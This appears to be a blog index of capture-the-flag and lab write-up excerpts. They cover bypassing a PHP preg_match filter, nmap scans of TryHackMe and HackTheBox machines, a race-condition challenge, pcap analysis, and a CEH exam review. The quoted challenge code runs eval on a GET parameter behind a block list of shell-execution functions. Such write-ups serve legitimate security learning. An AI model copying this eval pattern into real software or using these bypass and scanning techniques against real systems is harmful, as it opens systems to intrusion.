In this challenge, we have to bypass two preg_match functions to get the flag. The Given Code <?php #read flag.txt highlight_file(__FILE__); $code = $_GET['cmd']; $blocked_functions = '/(exec|shell_exec|system|`)/i'; if (preg_match($blocked_functions, $code)) { die("Hacking attempt detected"); } else { $blocked_functions = "/flag/i"; if (preg_match($blocked_functions, $code)) { die("Hacking attempt detected"); } else{ eval(urldecode($code)); } } ?> Initially, It highlights the code file. Then it stores the ‘cmd’ get parameter value in code variable, it blocks all the functions through which we can execute the shell commands....

Setup The following entry is being added to the /etc/hosts. 10.10.57.136 cmess.thm Enumeration Nmap all ports scan is being run. The following was the result of the scan. ┌──(kali㉿kali)-[~/Desktop/tryhackme/cmess] └─$ nmap 10.10.57.136 -p- --min-rate 2500 Starting Nmap 7.93 ( https://nmap.org ) at 2023-08-31 16:44 EDT Warning: 10.10.57.136 giving up on port because retransmission cap hit (10). Nmap scan report for cmess.thm (10.10.57.136) Host is up (0.18s latency). Not shown: 65507 closed tcp ports (conn-refused), 26 filtered tcp ports (no-response) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 43....

The web security challenge was vulnerable to race condition. The following was the given website. The following were the user details with IDs and funds. the /dump path has a comment, which reveals the source code. The following part of the code was vulnerable to Race Condition. A race window exists in the if condition. We can send multiple request parallelly, it will bypass the if condition before the deduction of funds....

Enumeration Initially I tried pinging the IP address. It is reachable. ┌──(kali㉿kali)-[~] └─$ ping 10.10.10.3 -c 3 PING 10.10.10.3 (10.10.10.3) 56(84) bytes of data. 64 bytes from 10.10.10.3: icmp_seq=1 ttl=63 time=173 ms 64 bytes from 10.10.10.3: icmp_seq=2 ttl=63 time=189 ms 64 bytes from 10.10.10.3: icmp_seq=3 ttl=63 time=172 ms --- 10.10.10.3 ping statistics --- 3 packets transmitted, 3 received, 0% packet loss, time 2004ms rtt min/avg/max/mdev = 171.906/178.070/189.264/7.928 ms I run nmap all ports on it for getting to know the open ports....

A pcap file was being given for analysis. The pcap file was being opened in the wireshark. I applied the http filter to filter only http requests. There was a zip file that was retrieved through http protocol. There was nothing interesting in this zip file. I moved on, and i found that many requests were being made to the /f_data/data endpoint. All the requests were giving 403 forbidden response except the last one, which gave 200 OK response....

In the following blog post, I will be recounting my personal experience taking the CEH practical exam, while also providing valuable guidance on how to prepare for this beginner-friendly certification. General Info about the CEH Practical Key value Price 550$ (Without training) Questions 20 Passing score 70% (14/20) Allowed time 6 Hours Proctored? Yes Link to purchase Here Cost Back in November 2022, during the Cyber Monday deal, I purchased the exam voucher for a cost of $150....